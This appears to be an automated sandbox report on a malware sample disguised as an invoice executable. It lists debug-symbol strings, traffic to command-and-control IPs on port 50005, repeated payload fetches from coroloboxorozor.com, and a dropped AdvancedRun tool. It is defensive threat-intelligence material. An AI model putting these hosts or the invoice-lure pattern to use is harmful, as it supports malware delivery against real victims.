Source: Binary string: nsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: psapi.pdbX source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
Source: Binary string: ole32.pdbT source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
Source: Binary string: WWCN-Invoice-XXXXX9808-19011143287990.PDB[[ source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
Source: Binary string: combase.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
Source: Binary string: iVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERCCD7.tmp.dmp.30.dr
Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
Source: Binary string: System.Configuration.pdb`Q) source: WERCCD7.tmp.dmp.30.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb` source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WERCCD7.tmp.dmp.30.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
Source: Binary string: shell32.pdb, source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: rawing.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: rasman.pdbN4P0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
Source: Binary string: version.pdbz source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
Source: Binary string: Accessibility.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
Source: Binary string: Accessibility.pdbT source: WERCCD7.tmp.dmp.30.dr
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb* source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb>3 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: HcC:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB4 source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000008.00000000.260198849.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.dr
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb?9W source: WerFault.exe, 0000001E.00000003.354208449.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbL source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbows source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: O.pdb? source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb| source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: oleaut32.pdbn source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: iertutil.pdbV4H0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcrypt.pdbv source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb| source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl0.Y source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbqR source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb@ source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: edputil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: global traffic | TCP traffic: 192.168.2.5:49724 -> 185.192.70.170:50005
        Source: global traffic | TCP traffic: 192.168.2.5:49739 -> 185.157.161.86:50005
        Source: global traffic | HTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1 Host: coroloboxorozor.com
        Source: Joe Sandbox View | IP Address: 185.157.161.86
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.161.86 (50 identical entries)
        Source: global traffic | HTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1 Host: coroloboxorozor.com
        Source: global traffic | HTTP traffic detected: GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1 Host: coroloboxorozor.com
        Source: unknown | DNS traffic detected: queries for: coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.html
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp | String found in binary or memory: http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: http://ocsp.sectigo.com0
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
        Source: WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
        Source: svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
        Source: AdvancedRun.exe, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: http://www.nirsoft.net/
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
        Source: svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
        Source: svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
        Source: svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
        Source: svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
        Source: svchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
        Source: svchost.exe, 00000012.00000003.288221774.000001F773232000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: https://sectigo.com/CPS0C
        Source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.dr | String found in binary or memory: https://sectigo.com/CPS0D
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
        Source: svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
